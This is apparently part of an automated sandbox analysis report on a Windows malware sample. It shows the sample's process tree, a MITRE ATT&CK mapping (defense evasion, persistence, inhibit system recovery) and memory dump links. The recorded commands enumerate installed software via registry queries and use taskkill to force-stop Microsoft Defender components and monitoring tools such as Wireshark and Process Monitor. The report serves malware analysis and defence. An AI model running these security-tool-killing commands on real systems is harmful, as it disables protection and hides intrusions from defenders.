- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4596
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:1120
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4664
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4964
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4668
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:5080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4124
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:5024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4432
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4052
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4544
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:1440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:3752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:2204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:3084
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3836
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4192
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4248
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4212
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4604
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4596
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4484
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3516
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4768
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3348
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4652
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4668
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4272
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3832-127-0x000002056CCA0000-0x000002056CCA1000-memory.dmp

Filesize
4KB

Download
memory/3832-112-0x000002056A810000-0x000002056A811000-memory.dmp

Filesize
4KB

Download
memory/3832-98-0x00007FFE344D0000-0x00007FFE34EBC000-memory.dmp

Filesize
9.9MB

Download